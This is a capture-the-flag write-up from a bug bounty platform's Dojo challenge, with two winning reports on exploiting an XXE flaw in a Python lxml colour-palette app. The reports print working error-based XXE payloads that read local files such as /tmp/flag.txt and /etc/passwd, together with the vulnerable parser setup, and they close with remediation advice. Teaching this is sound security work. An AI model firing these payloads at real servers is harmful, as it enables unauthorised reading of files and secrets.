Dojo challenge #42 - Hex Color Palette winners & writeup

July 11, 2025

The Dojo challenge, Hex Color Palette, required participants to exploit an XXE (XML External Entity) vulnerability in order to trigger a file disclosure.

By crafting a malicious XML payload, they had to trick the parser into leaking the contents of a sensitive local file, specifically /tmp/flag.txt.

💡 Want to create your own monthly Dojo challenge and win a contributor award? Send us a message on Twitter!

The winners

Congrats to 0necloud, CryptoCat and 3c4d for the best write-ups! 🥳

The swag is on its way! 🎁

Subscribe to our Twitter and/or LinkedIn feeds to be notified of upcoming challenges.

Read on to find out how one of the winners managed to solve the challenge.

OVERALL BEST WRITE-UPS

This time, things were a little different, and some context is needed.
I (@pwnwithlove) created the challenge, and while preparing it for release last month I realised that the original PoC no longer worked as expected.

After some investigation, I discovered that the issue was caused by an update to the Python lxml library.

In particular, a bug report from Anatoly Katyushin (heart1ess) revealed that payloads relying on parameter entities had worked reliably until this update, including in scenarios involving DTD injection and indirect file disclosure. However, changes in the underlying libxml2 library meant that lxml now blocked such payloads.

XXE resolve_entities bypass using Parameter Entity by Anatoly Katyushin

This change explains why the challenge suddenly stopped working: although the intended solution remained valid, the parser no longer processed parameter entities the way it used to, effectively breaking the error-based XXE vector the intended solution relied on.

To address this, we added a feature to Dojo that allows us to use the previous version of lxml when creating challenges, and I left the challenge itself unchanged.

Feature allowing Dojo to use the previous version of lxml

Instead, I have decided to publish two separate reports for this community write-up: one detailing the intended PoC before the lxml update, and another showcasing the exploitation technique based on Anatoly Katyushin's (heart1ess) discovery!

----- START OF 0necloud's REPORT -----

Description

This challenge revolves around a Python web application that renders user-supplied XML data through a templated HTML interface. The application uses the lxml library to parse XML files and extract hexadecimal colour codes to populate a front-end colour palette. However, the XML parser is configured to allow external Document Type Definitions (DTDs) and resolve entities, which opens the door to an XML External Entity (XXE) injection vulnerability.

Due to insufficient input validation and an insecure parser configuration, an attacker is able to inject arbitrary entity declarations and thereby manipulate the server into disclosing files stored on it.

Exploitation

To identify potential vulnerabilities within an application, analysing the source code is an effective approach as it reveals insecure coding practices, such as improper input validation or the misuse of certain libraries. In this scenario, we are presented with a web application that accepts a user input, which is then parsed by the program - potentially influencing the contents returned to the user.

Code Analysis

The first step in performing our taint tracking is to examine how our input is being handled by the program. In this scenario, a Web Application Firewall URL-encodes the user input before it reaches the web server.

data = unquote(USER_INPUT)

try:
    parsed_text, colors = promptFromXML(data)
except Exception as e:
    parsed_text = f"Error : {str(e)}"
    colors = []

print(template.render(output=parsed_text, colors=colors, image=None))

Our user input is first decoded using the unquote() function, which restores it to its original form (our raw input), before being passed to promptFromXML(), which in turn calls parse_palette(). The result of XML parsing, or any error that occurs, is echoed back to the user in a templated HTML response. This hints that our payload could manipulate the contents of error messages, which tend to be verbose.
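As a rough illustration of that flow, the sketch below decodes a URL-encoded input and reflects any parser exception back to the caller. The handle() function is hypothetical, and the standard library's xml.etree.ElementTree is used here only as a stand-in so the example runs without dependencies; the challenge itself uses lxml, whose error messages differ.

```python
from urllib.parse import quote, unquote
import xml.etree.ElementTree as ET


def handle(user_input: str) -> str:
    """Hypothetical stand-in for the challenge's top-level script."""
    data = unquote(user_input)  # undo the URL-encoding applied upstream
    try:
        ET.fromstring(data)  # stand-in parser, NOT lxml
        return "Palette successfully extracted"
    except Exception as e:
        # The parser's own message is reflected to the user verbatim.
        return f"Error : {e}"


encoded = quote("<colors><color>#fff</colors>")  # deliberately malformed XML
print(handle(encoded))
```

Whatever text the parser puts in its exception ends up in the response, which is the property the rest of the report relies on.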

def parse_palette(xml_data):
    parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
    tree = etree.parse(io.StringIO(xml_data), parser)
    root = tree.getroot()
    colors = set()

    # Only parsing hex color
    for elem in root.iter():
        if elem.text and re.match(r"^#(?:[0-9a-fA-F]{3,6})$", elem.text.strip()):
            colors.add(elem.text.strip().lower())

    return list(colors)

The parse_palette() function is where the bulk of the data processing happens. A few key points can be noted about its implementation:

  • load_dtd=True: allows the XML parser to load external DTDs
  • resolve_entities=True: enables the expansion of external entities
  • There is no sanitisation of the xml_data parameter

In the setup code, we can observe that there is a DTD file located at /tmp/xml/config.dtd:

with open("xml/config.dtd", 'w') as f:
    f.write('''
<!ENTITY % dtd "<!ELEMENT config (#PCDATA)>">
%config_hex;
''')

Note the reference to an undefined entity %config_hex.

Conclusions drawn from Code Analysis

From the configuration of lxml.etree.XMLParser in which both load_dtd and resolve_entities were set to True, we can deduce that the application will:

  1. Load external DTDs from file paths
  2. Expand nested parameter entities
  3. Attempt to resolve file paths provided within entity values

From the DTD file stored at /tmp/xml/config.dtd which contains an undefined entity %config_hex, we can deduce the possibility of overriding this entity with arbitrary ones, which will be subsequently loaded by the parser. Based on this idea, we can slowly piece together a payload:

To begin with, we need to load the local DTD at /tmp/xml/config.dtd:

<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">

Next, we need to override %config_hex, which could have nested parameter entities that would be expanded via the parser's resolve_entities=True configuration. We need to include the following:

<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">

This reads the contents of /tmp/flag.txt into the %flag entity.

<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">

This creates a nested entity %error that references a non-existent file path (aaa) with the flag appended to it.

%eval;

This expands %eval, which causes the parser to resolve %error.

Finally, we just need the parser to load /tmp/xml/config.dtd, which will then encounter %config_hex (which we have overridden).

%local_dtd;

The parser will then read the contents of /tmp/flag.txt into %flag, and within %error, construct a path file:///aaa/{FLAG_CONTENT}. Since the filepath aaa/{FLAG_CONTENT} most probably does not exist, an error containing the resolved path will be thrown, and the resolved path will be returned as part of the error message (hopefully).
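The leak relies on a general property of file-access errors: the failing path is usually quoted in the message. The sketch below shows the same effect in plain Python as an analogy only; it does not involve lxml, and leak_via_error() and the FLAG{demo_value} string are placeholders invented for the illustration.

```python
def leak_via_error(secret: str) -> str:
    """Return the error text produced by opening a path that embeds `secret`."""
    bogus_path = f"/aaa/{secret}"  # same shape as file:///aaa/%flag;
    try:
        with open(bogus_path) as handle:
            handle.read()
    except OSError as e:
        # The operating system error names the path it could not open.
        return f"Error : {e}"
    return "no error"


print(leak_via_error("FLAG{demo_value}"))
```

If the application reflects that message, the secret embedded in the path is disclosed even though the file read itself "failed".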

Proof of Concept

Before we merge everything together, we need to note that some characters must be replaced with their hexadecimal character references to bypass parser restrictions and prevent premature expansion during entity parsing.

  • % -> &#x25;
  • & -> &#x26;
  • ' -> &#x27;

Double-encoding is also used to delay expansions. For example, &#x26;#x25; -> &#x25; -> %.
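To make the two decoding passes concrete, here is a minimal sketch that resolves hexadecimal character references one layer at a time. The decode_once() helper is hypothetical and only mimics the substitution step; a real XML parser applies these rules as part of entity processing.

```python
import re

# Matches hexadecimal character references such as &#x25;
_HEX_REF = re.compile(r"&#x([0-9a-fA-F]+);")


def decode_once(text: str) -> str:
    """Replace each hexadecimal character reference with its character, once."""
    return _HEX_REF.sub(lambda m: chr(int(m.group(1), 16)), text)


first = decode_once("&#x26;#x25;")  # the outer &#x26; becomes "&"
second = decode_once(first)         # the remaining &#x25; becomes "%"
print(first, second)
```

Each pass peels off exactly one layer, which is why the innermost declaration in the payload needs the double-encoded form.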

Flag Revealed

PAYLOAD:

<!DOCTYPE colors [
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
<!ENTITY % config_hex '
<!ENTITY &#x25; flag SYSTEM "file:///tmp/flag.txt">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///aaa/&#x25;flag;&#x27;>">&#x25;eval;'>
%local_dtd;
]>

FLAG: FLAG{3rr0r_B4s3d_XX3_w1th_Sw4G}

Risk

This vulnerability presents a serious risk as it allows an attacker to read files on the server, leading to a loss of confidentiality. For example, we are able to leak the contents of /etc/passwd:

/etc/passwd leaked

Remediation

To remediate this vulnerability, the load_dtd and resolve_entities options of lxml.etree.XMLParser should be set to False to prevent the loading of DTDs and the expansion of entities.

Input validation and sanitisation should be incorporated before the user input is processed by the parse_palette() function to prevent blacklisted characters and keywords (e.g. <!DOCTYPE, SYSTEM) from being parsed.

Additionally, error messages returned to the user should avoid including the XML parser's error messages as these could unintentionally leak file paths, stack traces, and in this scenario, the contents of arbitrary files.
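The input-validation and error-handling points could look roughly like the sketch below. The names reject_dtd(), safe_message() and GENERIC_ERROR are hypothetical, and the keyword list is illustrative rather than exhaustive; a filter like this is a complement to the parser settings above, not a replacement for them.

```python
import logging
import re

# Keywords named in the remediation text; illustrative, not exhaustive.
_FORBIDDEN = re.compile(r"<!\s*(DOCTYPE|ENTITY)|\bSYSTEM\b", re.IGNORECASE)

GENERIC_ERROR = "Error : the XML document could not be processed"


def reject_dtd(xml_data: str) -> str:
    """Raise ValueError if the input declares a DTD or entities."""
    if _FORBIDDEN.search(xml_data):
        raise ValueError("DTDs and entity declarations are not accepted")
    return xml_data


def safe_message(exc: Exception) -> str:
    """Log the real error server-side and return a fixed message to the user."""
    logging.getLogger(__name__).warning("XML parsing failed: %s", exc)
    return GENERIC_ERROR
```

In the challenge's flow, reject_dtd() would run before parse_palette(), and safe_message() would replace the f"Error : {str(e)}" string in the exception handler.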

----- END OF 0necloud's REPORT -----

As explained earlier, this approach no longer works with the current version of lxml.
Even with resolve_entities=True, it's no longer possible to trigger an XXE using parameter entities - which were previously exploitable regardless of this setting.

Now it's time to take a closer look at the behavior we discussed earlier, illustrated through CryptoCat's report 👇

----- START OF CryptoCat's REPORT -----

Description

With this application, you can now display your own hex color palettes and unleash your inner UX designer! Simply upload your own XML files to generate custom palettes. Can you find the flag?


The flag can be found in /tmp/flag.txt

Solution

In this writeup, we'll review the latest YesWeHack Dojo challenge, created by Pwnii 💜

Source code review

setup.py

Starting with the server setup code, we see that the flag is placed in the /tmp directory, along with folders for templates and XML files.

os.chdir("/tmp/")
os.makedirs("templates", exist_ok=True)
os.makedirs("xml", exist_ok=True)

with open("flag.txt", "w") as f:
    f.write(flag)

There's a sample XML file and DTD.

with open("xml/sample.xml", 'w') as f:
    f.write('''
<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#FF5733</color>
<color>#1E3A8A</color>
<color>#2ECC71</color>
<color>#F1C40F</color>
<color>#8E44AD</color>
<color>#2C3E50</color>
<color>#FFC0CB</color>
<color>#00FFFF</color>
</colors>
''')

with open("xml/config.dtd", 'w') as f:
    f.write('''
<!ENTITY % dtd "<!ELEMENT config (#PCDATA)>">
%config_hex;
''')

An index.tpl file is generated; I'll skip most of the CSS/HTML, which does not seem relevant.

<div class="content">
    <h2>Extracted Color Palette</h2>
    <p class="debug">{{ output }}</p>
    <div class="palette">
        {% if colors %} {% for color in colors %}
        <div class="color-box" style="background: {{ color }};">{{ color }}</div>
        {% endfor %} {% else %}
        <p class="debug">No colors detected.</p>
        {% endif %}
    </div>
</div>

challenge.py

Now onto the challenge code. It imports jinja2 and lxml which should make us think of SSTI and/or XXE vulnerabilities. It specifically loads version 5.3.2 of lxml so checking if it's the latest version or there are known vulnerabilities should be added to our TODO list.

from jinja2 import Environment, FileSystemLoader
lxml = import_v("lxml", "5.3.2")
from lxml import etree

Next, the template is loaded. The autoescape option will prevent XSS by escaping HTML variables.

template = Environment(
    autoescape=True,
    loader=FileSystemLoader('/tmp/templates'),
).get_template('index.tpl')
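To show what escaping buys us here, the sketch below uses the standard library's html.escape as a stand-in for Jinja2's autoescaping. This is an approximation: Jinja2 relies on its own escaping routine, and render_debug() is a hypothetical helper mirroring the debug paragraph in index.tpl.

```python
import html


def render_debug(output: str) -> str:
    """Hypothetical stand-in for the <p class="debug">{{ output }}</p> line."""
    return f'<p class="debug">{html.escape(output)}</p>'


print(render_debug("Error : <script>alert(1)</script>"))
```

Markup in the reflected error text is neutralised, but the text itself is still shown to the user, so escaping does nothing to stop information leaking through error messages.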

A parse_palette function is declared. The first thing to note is its susceptibility to XXE attacks:

- load_dtd=True → allows loading external/internal DTDs.
- resolve_entities=True → allows expanding general and parameter entities.

def parse_palette(xml_data):
    parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
    tree = etree.parse(io.StringIO(xml_data), parser)
    root = tree.getroot()
    colors = set()

    # Only parsing hex color
    for elem in root.iter():
        if elem.text and re.match(r"^#(?:[0-9a-fA-F]{3,6})$", elem.text.strip()):
            colors.add(elem.text.strip().lower())

    return list(colors)

However, there is some regex on the XML elements to ensure they match a hex colour code format. It must start with a #, followed by 3-6 hex characters e.g. #1337 or #420420.
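A quick way to see what the filter accepts is to run the same pattern over a few samples. In this sketch, is_hex_colour() is a hypothetical wrapper around the regex from parse_palette(), and FLAG{demo} is a placeholder string.

```python
import re

# Same pattern as in parse_palette()
HEX_COLOUR = re.compile(r"^#(?:[0-9a-fA-F]{3,6})$")


def is_hex_colour(text: str) -> bool:
    """Apply the same check as parse_palette() to one element's text."""
    return bool(HEX_COLOUR.match(text.strip()))


for sample in ["#fff", "#1337", "#12345", "#420420", "#1234567", "FLAG{demo}"]:
    print(sample, is_hex_colour(sample))
```

Since file contents such as a flag will not match this pattern, getting them rendered as a colour is unlikely to work, which makes the error path the more promising route.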

There's one more function: promptFromXML. It simply takes a string and passes it to the parse_palette function we just looked at.

def promptFromXML(s: str):
    if not s:
        return "No XML data received.", []

    return "Pallet successfully extracted", parse_palette(s)

Finally, the script ties it all together. It takes our user input (note this is URL-encoded by the WAF, hence the unquote) and passes it to the promptFromXML function. The parsed colours will be returned and then rendered using template.render.

data = unquote("USER_INPUT_GOES_HERE")

try:
    parsed_text, colors = promptFromXML(data)
except Exception as e:
    parsed_text = f"Error : {str(e)}"
    colors = []

print(template.render(output=parsed_text, colors=colors, image=None))

Testing functionality

The setup.py code provided a sample XML file. It's a good idea to test it first, just to visualise the intended functionality of the app.

<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#1337</color>
<color>#420420</color>
</colors>

The colours are "successfully extracted" from our XML input and rendered in the template.

If we can exploit an XXE vulnerability to read flag.txt, we'll need to either:

  • Somehow render the contents as colour codes
  • Trigger an exception that leaks the contents via an error

XXE in lxml library

Remember when we reviewed the source code and made a note to check for known vulnerabilities in the lxml library? Well, version 5.4.0 was released ~6 weeks ago. Why wouldn't Pwnii include the latest version? 🧐

Let's check out the "bugs fixed" section in the release notes.

  • LP#2107279: Binary wheels use libxml2 2.13.8 and libxslt 1.1.43 to resolve several CVEs.
  • (Binary wheels for Windows continue to use a patched libxml2 2.11.9 and libxslt 1.1.39.)
  • Issue found by Anatoly Katyushin, see https://bugs.launchpad.net/lxml/+bug/2107279

Reviewing the link reveals some key information about versions 5.0.0 through 5.3.2.

  • lxml lib from 5.0.0 restricts XXE parsing and requires resolve_entities to disable the restriction

However...

  • libxml doesn't restrict Parameter Entities, that leads to XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE msg [
<!ENTITY % a '
<!ENTITY &#x25; file SYSTEM "/etc/passwd">
<!ENTITY &#x25; b "<!ENTITY c &#x27;&#x25;file;&#x27;>">
'>
%a;
%b;
]>
<msg>&c;</msg>

The challenge meets both conditions:

  • Using lxml < 5.4.0
  • resolve_entities is set to True
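The version condition can be checked mechanically. The sketch below is a simplified comparison that assumes plain numeric versions such as "5.3.2" (it is not a full PEP 440 parser); in_affected_range() is a hypothetical helper, and the 5.0.0 to 5.3.2 range is taken from the bug report quoted above.

```python
def parse_version(version: str) -> tuple[int, ...]:
    """Turn '5.3.2' into (5, 3, 2); assumes purely numeric components."""
    return tuple(int(part) for part in version.split("."))


def in_affected_range(version: str) -> bool:
    """True for versions from 5.0.0 up to, but not including, 5.4.0."""
    return (5, 0, 0) <= parse_version(version) < (5, 4, 0)


for candidate in ["4.9.4", "5.0.0", "5.3.2", "5.4.0"]:
    print(candidate, in_affected_range(candidate))
```

The challenge pins 5.3.2, which falls inside that range.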

Error-based data exfiltration

Can we do something similar? Let's try and swap out the values.

<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY &#x25; file SYSTEM "file:///tmp/flag.txt">
<!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;meow://&#x25;file;&#x27;>">
'>
%a;
%b;
]>
<colors><color>&c;</color></colors>

1. %file; reads /tmp/flag.txt (still allowed for parameter entities).
2. %b; creates a general entity c whose SYSTEM URI becomes meow://<contents-of-flag.txt>.
3. When the parser meets &c; it tries to fetch that URI but fails and raises an error (apparently meow is not a real protocol 🙀).
4. The wrapper catches the exception and prints it: Error : Invalid URI: meow://FLAG{.*}.
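Because the input passes through unquote() on the server side, the payload can be URL-encoded before submission. The sketch below assembles the payload from this section and encodes it; build_payload() and its parameters are hypothetical conveniences, and the encoding step is an assumption about how the input is delivered.

```python
from urllib.parse import quote, unquote

# Same structure as the payload above, with the path and scheme as placeholders.
PAYLOAD_TEMPLATE = """<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY &#x25; file SYSTEM "file://{path}">
<!ENTITY &#x25; b "<!ENTITY c SYSTEM &#x27;{scheme}://&#x25;file;&#x27;>">
'>
%a;
%b;
]>
<colors><color>&c;</color></colors>"""


def build_payload(path: str = "/tmp/flag.txt", scheme: str = "meow") -> str:
    """Fill in the target file and the bogus URI scheme."""
    return PAYLOAD_TEMPLATE.format(path=path, scheme=scheme)


payload = build_payload()
encoded = quote(payload, safe="")  # percent-encode every reserved character
print(encoded)
```

Decoding the result with unquote() yields the original payload again, which is what the server-side code does before parsing.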

It worked! We get the flag: FLAG{3rr0r_B4s3d_XX3_w1th_Sw4G} 😎

Remediation

- Upgrade lxml to >= 5.4.0.
- Disable load_dtd or at least resolve_entities when you do not expect complex DTDs.
- Sanity-check and fully whitelist incoming XML before feeding it to a parser.

Summary (TLDR)

In this challenge, we're given a colour palette viewer that parses XML files using an outdated version of lxml. Turns out, it's vulnerable to XXE. With both load_dtd and resolve_entities enabled, and version 5.3.2 in play, we can pull off a parameter entity injection to leak the contents of /tmp/flag.txt. Since the parser throws an error on weird URIs, we abuse that to leak the flag through a debug message. Classic error-based XXE, but with a nice UX-themed twist.

----- END OF CryptoCat's REPORT -----